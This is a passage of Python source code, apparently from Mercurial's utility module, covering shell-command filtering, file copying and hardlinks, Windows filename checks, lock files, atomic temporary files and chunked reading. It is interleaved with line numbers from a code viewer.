    lookups find the cached value instead of invoking the descriptor.
    """
    def __init__(self, func):
        self.func = func
        self.name = func.__name__

    def __get__(self, obj, type=None):
        value = self.func(obj)
        self.cachevalue(obj, value)
        return value

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value
1512
1512
def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    # propertycache stores values directly in the instance __dict__;
    # dropping the entry forces recomputation on next access.
    obj.__dict__.pop(prop, None)
1517
1517
def pipefilter(s, cmd):
    '''filter string S through command CMD, returning its output'''
    # shell=True so CMD may be an arbitrary shell pipeline; closefds is a
    # module-level constant defined elsewhere in this file.
    proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    stdout, _stderr = proc.communicate(s)
    return stdout
1524
1524
def tempfilter(s, cmd):
    '''filter string S through a pair of temporary files with CMD.
    CMD is used as a template to create the real command to be run,
    with the strings INFILE and OUTFILE replaced by the real names of
    the temporary files generated.'''
    inname, outname = None, None
    try:
        # write the input to a temp file the command can read
        infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
        fp = os.fdopen(infd, r'wb')
        fp.write(s)
        fp.close()
        # pre-create the output file so we only have to read it back
        outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
        os.close(outfd)
        cmd = cmd.replace('INFILE', inname)
        cmd = cmd.replace('OUTFILE', outname)
        code = os.system(cmd)
        # on OpenVMS, an odd status value means success
        if pycompat.sysplatform == 'OpenVMS' and code & 1:
            code = 0
        if code:
            raise Abort(_("command '%s' failed: %s") %
                        (cmd, explainexit(code)))
        return readfile(outname)
    finally:
        # best-effort cleanup of both temporary files
        try:
            if inname:
                os.unlink(inname)
        except OSError:
            pass
        try:
            if outname:
                os.unlink(outname)
        except OSError:
            pass
1558
1558
# maps a filter-spec prefix to the function implementing that strategy;
# consulted by filter() below
filtertable = {
    'tempfile:': tempfilter,
    'pipe:': pipefilter,
}
1563
1563
def filter(s, cmd):
    "filter a string through a command that transforms its input to its output"
    # NOTE: shadows the builtin filter() within this module.
    # dispatch on an explicit 'tempfile:'/'pipe:' prefix; default is a pipe
    for name, fn in filtertable.iteritems():
        if cmd.startswith(name):
            return fn(s, cmd[len(name):].lstrip())
    return pipefilter(s, cmd)
1570
1570
def binary(s):
    """return true if a string is binary data"""
    # empty/None input is not binary; otherwise a NUL byte marks binary data
    if not s:
        return False
    return '\0' in s
1574
1574
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def log2(x):
        # floor(log2(x)), with log2(0) == 0
        if not x:
            return 0
        bits = 0
        while x:
            x >>= 1
            bits += 1
        return bits - 1

    pending = []
    pendinglen = 0
    for piece in source:
        pending.append(piece)
        pendinglen += len(piece)
        if pendinglen < min:
            continue
        if min < max:
            # grow the threshold: at least double it, jump straight past
            # the size just emitted if that is larger, and cap at max
            min <<= 1
            nmin = 1 << log2(pendinglen)
            if nmin > min:
                min = nmin
            if min > max:
                min = max
        yield ''.join(pending)
        pending = []
        pendinglen = 0
    if pending:
        yield ''.join(pending)
1605
1605
# re-exported for convenience; the canonical definition lives in error.py
Abort = error.Abort
1607
1607
def always(fn):
    """predicate helper: accept any input"""
    return True
1610
1610
def never(fn):
    """predicate helper: reject any input"""
    return False
1613
1613
def nogc(func):
    """decorator: run ``func`` with the cyclic garbage collector disabled

    CPython triggers a collection whenever enough container objects have
    been allocated (see gc.get_threshold()), even for objects marked as
    untracked; tracking only affects what the collector inspects, not when
    it runs. Disabling GC while building large containers avoids that
    overhead. (Largely fixed in 2.7, but still measurable on CPython.)
    """
    def wrapper(*args, **kwargs):
        wasenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            # only re-enable if the caller had it on to begin with
            if wasenabled:
                gc.enable()
    return wrapper
1636
1636
if pycompat.ispypy:
    # PyPy runs slower with gc disabled, so make nogc a no-op there
    nogc = lambda x: x
1640
1640
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        # across drives (Windows) there is no relative path:
        # fall back to an absolute path under root
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    # strip the common leading components of both paths
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    # climb out of what remains of n1, then descend into n2
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1666
1666
def mainfrozen():
    """return True if we are a frozen executable.

    The code supports py2exe (most common, Windows only) and tools/freeze
    (portable, not much used).
    """
    if safehasattr(sys, "frozen"):     # new py2exe
        return True
    if safehasattr(sys, "importers"):  # old py2exe
        return True
    return imp.is_frozen(u"__main__")  # tools/freeze
1676
1676
# the location of data files matching the source code
if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

# tell the i18n machinery where to find message catalogs
i18n.setdatapath(datapath)
1685
1685
# cached path of the 'hg' executable; computed lazily by hgexecutable()
_hgexecutable = None
1687
1687
def hgexecutable():
    """return location of the 'hg' executable.

    Defaults to $HG or 'hg' in the search path.

    The result is cached in the module-level _hgexecutable on first call.
    """
    if _hgexecutable is None:
        hg = encoding.environ.get('HG')
        mainmod = sys.modules[r'__main__']
        if hg:
            _sethgexecutable(hg)
        elif mainfrozen():
            if getattr(sys, 'frozen', None) == 'macosx_app':
                # Env variable set by py2app
                _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
            else:
                _sethgexecutable(pycompat.sysexecutable)
        elif (os.path.basename(
            pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
            # running directly from an 'hg' script (e.g. a source checkout)
            _sethgexecutable(pycompat.fsencode(mainmod.__file__))
        else:
            # last resort: search $PATH, falling back to argv[0]
            exe = findexe('hg') or os.path.basename(sys.argv[0])
            _sethgexecutable(exe)
    return _hgexecutable
1711
1711
def _sethgexecutable(path):
    """set location of the 'hg' executable"""
    # stored in the module-level cache consulted by hgexecutable()
    global _hgexecutable
    _hgexecutable = path
1716
1716
1717 def _testfileno(f, stdf):
1717 def _testfileno(f, stdf):
1718 fileno = getattr(f, 'fileno', None)
1718 fileno = getattr(f, 'fileno', None)
1719 try:
1719 try:
1720 return fileno and fileno() == stdf.fileno()
1720 return fileno and fileno() == stdf.fileno()
1721 except io.UnsupportedOperation:
1721 except io.UnsupportedOperation:
1722 return False # fileno() raised UnsupportedOperation
1722 return False # fileno() raised UnsupportedOperation
1723
1723
def isstdin(f):
    """Return truthy if ``f`` shares a descriptor with the real stdin."""
    return _testfileno(f, sys.__stdin__)
1726
1726
def isstdout(f):
    """Return truthy if ``f`` shares a descriptor with the real stdout."""
    return _testfileno(f, sys.__stdout__)
1729
1729
def shellenviron(environ=None):
    """return environ with optional override, useful for shelling out"""
    def py2shell(val):
        'convert python object into string that is useful to shell'
        # None/False -> '0', True -> '1', everything else stringified
        if val is None or val is False:
            return '0'
        if val is True:
            return '1'
        return pycompat.bytestr(val)
    env = dict(encoding.environ)
    if environ:
        env.update((k, py2shell(v)) for k, v in environ.iteritems())
    # expose our own executable so hooks/child commands can re-invoke hg
    env['HG'] = hgexecutable()
    return env
1744
1744
def system(cmd, environ=None, cwd=None, out=None):
    '''enhanced shell command execution.
    run with environment maybe modified, maybe in different dir.

    if out is specified, it is assumed to be a file-like object that has a
    write() method. stdout and stderr will be redirected to out.'''
    # flush our own buffered output before the child starts writing
    try:
        stdout.flush()
    except Exception:
        pass
    cmd = quotecommand(cmd)
    env = shellenviron(environ)
    if out is None or isstdout(out):
        # the child can write straight to our stdout; no relaying needed
        rc = subprocess.call(cmd, shell=True, close_fds=closefds,
                             env=env, cwd=cwd)
    else:
        # capture the child's combined stdout/stderr and relay it to 'out'
        proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                                env=env, cwd=cwd, stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT)
        for line in iter(proc.stdout.readline, ''):
            out.write(line)
        proc.wait()
        rc = proc.returncode
    # on OpenVMS, an odd status value means success
    if pycompat.sysplatform == 'OpenVMS' and rc & 1:
        rc = 0
    return rc
1771
1771
def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            # a traceback depth of 1 means the TypeError came from the call
            # itself (mismatched signature), not from inside func's body
            if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
                raise error.SignatureError
            raise

    return check
1783
1783
# a whitelist of known filesystems where hardlink works reliably
_hardlinkfswhitelist = {
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'NTFS',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}
1799
1799
def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            # remember dest's stat before unlinking so we can detect an
            # ambiguous (same-second) mtime on the copy afterwards
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't needed
        # for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
            if oldstat and oldstat.stat:
                newstat = filestat.frompath(dest)
                if newstat.isambig(oldstat):
                    # stat of copied file is ambiguous to original one:
                    # nudge mtime forward by one second (wrapping at 2**31)
                    # so later stat comparisons can tell the files apart
                    advanced = (
                        oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                    os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise Abort(str(inst))
1852
1852
def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
    """Copy a directory tree using hardlinks if possible.

    Returns a (hardlink, num) pair: whether hardlinking was still in effect
    at the end, and how many files were copied/linked.
    """
    num = 0

    gettopic = lambda: hardlink and _('linking') or _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            # hardlinking only works when src and dst share a device
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            def nprog(t, pos):
                # offset the child's progress by files already processed
                if pos is not None:
                    return progress(t, pos + num)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                # once hardlinking fails, stop trying for the rest of the tree
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        progress(topic, num)
    progress(topic, None)

    return hardlink, num
1892
1892
# base names and characters that are invalid in Windows filenames
_winreservednames = {
    'con', 'prn', 'aux', 'nul',
    'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
    'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    # validate each path component individually
    for n in path.replace('\\', '/').split('/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            if ord(c) <= 31:
                # control characters are invalid in Windows filenames
                return _("filename contains '%s', which is invalid "
                         "on Windows") % escapestr(c)
        # DOS device names (con, nul, com1, ...) are reserved regardless of
        # any extension, so only the part before the first dot matters
        base = n.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        t = n[-1:]
        # trailing dot/space is disallowed; "n not in '..'" exempts exactly
        # '.' and '..' (the only non-empty substrings of '..')
        if t in '. ' and n not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % t
1945
1945
# pick the platform filename checker and the best wall-clock timer
if pycompat.iswindows:
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

# prefer the high-resolution counter when available (Python 3.3+)
if safehasattr(time, "perf_counter"):
    timer = time.perf_counter
1955
1955
def makelock(info, pathname):
    """Create a lock file atomically if possible

    This may leave a stale lock file if symlink isn't supported and signal
    interrupt is enabled.
    """
    # preferred strategy: a symlink whose target encodes the lock info;
    # symlink creation is atomic and fails if the lock already exists
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        if why.errno == errno.EEXIST:
            raise
        # any other OSError (e.g. filesystem without symlink support):
        # fall through to the plain-file strategy below
    except AttributeError: # no symlink in os
        pass

    # O_EXCL makes the open fail if the lock file already exists
    flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
    ld = os.open(pathname, flags)
    os.write(ld, info)
    os.close(ld)
1974
1974
def readlock(pathname):
    """Read lock info written by makelock().

    The lock is either a symlink (preferred form, read via readlink) or a
    regular file whose content is the info string.
    """
    try:
        return os.readlink(pathname)
    except OSError as why:
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
        # EINVAL: not a symlink; ENOSYS: symlinks unsupported here --
        # fall through and read it as a plain file
    except AttributeError: # no symlink in os
        pass
    fp = posixfile(pathname, 'rb')
    r = fp.read()
    fp.close()
    return r
1987
1987
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        fd = fp.fileno()
    except AttributeError:
        # no fileno(): fall back to stat'ing by name
        return os.stat(fp.name)
    return os.fstat(fd)
1994
1994
1995 # File system features
1995 # File system features
1996
1996
1997 def fscasesensitive(path):
1997 def fscasesensitive(path):
1998 """
1998 """
1999 Return true if the given path is on a case-sensitive filesystem
1999 Return true if the given path is on a case-sensitive filesystem
2000
2000
2001 Requires a path (like /foo/.hg) ending with a foldable final
2001 Requires a path (like /foo/.hg) ending with a foldable final
2002 directory component.
2002 directory component.
2003 """
2003 """
2004 s1 = os.lstat(path)
2004 s1 = os.lstat(path)
2005 d, b = os.path.split(path)
2005 d, b = os.path.split(path)
2006 b2 = b.upper()
2006 b2 = b.upper()
2007 if b == b2:
2007 if b == b2:
2008 b2 = b.lower()
2008 b2 = b.lower()
2009 if b == b2:
2009 if b == b2:
2010 return True # no evidence against case sensitivity
2010 return True # no evidence against case sensitivity
2011 p2 = os.path.join(d, b2)
2011 p2 = os.path.join(d, b2)
2012 try:
2012 try:
2013 s2 = os.lstat(p2)
2013 s2 = os.lstat(p2)
2014 if s2 == s1:
2014 if s2 == s1:
2015 return False
2015 return False
2016 return True
2016 return True
2017 except OSError:
2017 except OSError:
2018 return True
2018 return True
2019
2019
# optional accelerated regexp engine. _re2 is a tri-state flag: None means
# re2 imported but not yet probed (see _re._checkre2), False means
# unavailable, True means usable.
try:
    import re2
    _re2 = None
except ImportError:
    _re2 = False
2025
2025
class _re(object):
    """Regular expression helpers that prefer re2 when it is usable.

    Falls back to the stdlib ``re`` module (``remod``) when re2 is
    missing, broken, or the requested flags/pattern are not
    re2-compatible.
    """
    def _checkre2(self):
        """Probe whether re2 actually works; record the answer in _re2."""
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            # re2 takes no flags argument; encode them inline in the pattern
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                # pattern uses features re2 does not support; fall through
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape
2068
2068
# shared singleton instance of _re
re = _re()
2070
2070
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(dir):
        # map normcased entry name -> on-disk entry name for one directory
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    # NOTE: str.replace() returns a new string; the previous code discarded
    # the result, so a backslash separator was never doubled and ``\/``
    # inside the character class below read as an escaped slash, silently
    # dropping '\' from the separator class.
    seps = seps.replace('\\', '\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            # runs of separators are passed through unchanged
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patches of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)
2113
2113
def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1, f2, fp = None, None, None
    try:
        fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                  suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        # derive the hardlink target name from the temp file name
        f2 = '%s2~' % f1[:-2]

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        # link creation or stat failed: assume hardlink counting is broken
        return False
    finally:
        # close before unlinking, then best-effort removal of both names
        if fp is not None:
            fp.close()
        for f in (f1, f2):
            try:
                if f is not None:
                    os.unlink(f)
            except OSError:
                pass
2142
2142
def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    if path.endswith(pycompat.ossep):
        return True
    altsep = pycompat.osaltsep
    return altsep and path.endswith(altsep)
2147
2147
def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative of simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if need.'''
    separator = pycompat.ossep
    return path.split(separator)
2155
2155
def gui():
    '''Are we running in a GUI?'''
    if not pycompat.isdarwin:
        return pycompat.iswindows or encoding.environ.get("DISPLAY")
    # macOS: a GUI may be absent even though the platform supports one
    if 'SSH_CONNECTION' in encoding.environ:
        # handle SSH access to a box where the user is logged in
        return False
    if getattr(osutil, 'isgui', None):
        # check if a CoreGraphics session is available
        return osutil.isgui()
    # pure build; use a safe default
    return True
2170
2170
def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents from name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode)
    if emptyok:
        return temp
    # nested try: the inner except handles a missing source file, the outer
    # one removes the temp file on any other failure before re-raising
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                # source does not exist: the (empty) temp file is fine as-is
                return temp
            if not getattr(inst, 'filename', None):
                # attach the offending path so the error message is useful
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp
2211
2211
class filestat(object):
    """help to exactly detect change of a file

    'stat' attribute is result of 'os.stat()' if specified 'path'
    exists. Otherwise, it is None. This can avoid preparative
    'exists()' examination on client side of this class.
    """
    def __init__(self, stat):
        # stat: os.stat() result for the tracked file, or None if absent
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        """Build a filestat for path; stat is None if path does not exist."""
        try:
            stat = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            stat = None
        return cls(stat)

    @classmethod
    def fromfp(cls, fp):
        """Build a filestat from an already-open file object via fstat()."""
        stat = os.fstat(fp.fileno())
        return cls(stat)

    # keep identity-based hashing even though __eq__ is overridden
    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (self.stat.st_size == old.stat.st_size and
                    self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
                    self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
        except AttributeError:
            # at least one side has stat == None (missing file); equal only
            # if both do
            pass
        try:
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more at
        same time in sec (= S[n-1].ctime), and comparison of timestamp
        is ambiguous.

        Base idea to avoid such ambiguity is "advance mtime 1 sec, if
        timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        by confliction between such mtime.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if size of a file isn't changed.
        """
        try:
            return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
        except AttributeError:
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be previous filestat of 'path'.

        This skips avoiding ambiguity, if a process doesn't have
        appropriate privileges for 'path'. This returns False in this
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        # bump mtime by one second, masked to stay within 32-bit range
        advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on the file created by another user causes EPERM,
                # if a process doesn't have appropriate privileges
                return False
            raise
        return True

    def __ne__(self, other):
        # Python 2 does not derive __ne__ from __eq__ automatically
        return not self == other
2313
2313
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    checkambig argument of constructor is used with filestat, and is
    useful only if target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        """Commit: rename the temporary file over the permanent name."""
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            # oldstat is falsy unless checkambig was requested
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        """Abort: delete the temporary file, abandoning all writes."""
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        # commit on clean exit, discard if an exception escaped the block
        if exctype is not None:
            self.discard()
        else:
            self.close()
2376
2376
def unlinkpath(f, ignoremissing=False):
    """unlink and remove the directory if it is empty"""
    remove = tryunlink if ignoremissing else unlink
    remove(f)
    # try removing directories that might now be empty
    try:
        removedirs(os.path.dirname(f))
    except OSError:
        pass
2388
2388
def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as err:
        if err.errno == errno.ENOENT:
            # already gone: that is exactly what we wanted
            return
        raise
2396
2396
def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            return
        if err.errno != errno.ENOENT or not name:
            raise
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            # reached the filesystem root without success; give up
            raise
        # create missing ancestors first, then retry this directory
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)
2424
2424
def readfile(path):
    """Return the entire binary contents of the file at ``path``."""
    fp = open(path, 'rb')
    try:
        return fp.read()
    finally:
        fp.close()
2428
2428
def writefile(path, text):
    """Replace the contents of the file at ``path`` with ``text``."""
    fp = open(path, 'wb')
    try:
        fp.write(text)
    finally:
        fp.close()
2432
2432
def appendfile(path, text):
    """Append ``text`` to the file at ``path``, creating it if missing."""
    fp = open(path, 'ab')
    try:
        fp.write(text)
    finally:
        fp.close()
2436
2436
class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            # re-slice any chunk over 1MB into 256KB pieces so no single
            # queue entry is huge
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        self._queue = collections.deque()
        # read offset into the chunk at the head of the queue
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

